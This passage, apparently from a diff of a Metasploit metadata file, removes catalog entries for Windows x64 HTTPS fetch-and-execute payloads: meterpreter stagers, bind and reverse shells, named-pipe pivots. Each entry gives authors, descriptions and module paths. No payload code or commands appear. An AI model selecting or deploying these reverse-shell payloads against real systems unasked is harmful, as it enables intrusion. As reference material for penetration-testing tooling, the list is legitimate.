"HTTPS Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp_rc4": { - "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/custom/bind_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/custom/reverse_http": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/custom/reverse_https": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/custom/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp_rc4": { - "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/https/x64/custom/reverse_tcp_uuid": { - "name": "HTTPS Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/https/x64/custom/reverse_winhttp": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/https/x64/custom/reverse_winhttps": { - "name": "HTTPS Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/https/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": { - "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/https/x64/encrypted_shell_reverse_tcp": { - "name": "HTTPS Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/https/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/https/x64/exec": { - "name": "HTTPS Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/https/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/https/x64/loadlibrary": { - "name": "HTTPS Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/https/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/https/x64/messagebox": { - "name": "HTTPS Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/https/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "HTTPS Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp_rc4": { - "name": "HTTPS Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/https/x64/meterpreter/bind_tcp_uuid": { - "name": "HTTPS Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_http": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_http", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_https": { - "name": "HTTPS Fetch, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/https/x64/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/https/x64", - "adapted_refname": "windows/x64/meterpreter/reverse_https", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/https/x64/meterpreter/reverse_named_pipe": { - "name": "HTTPS Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/https/x64/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 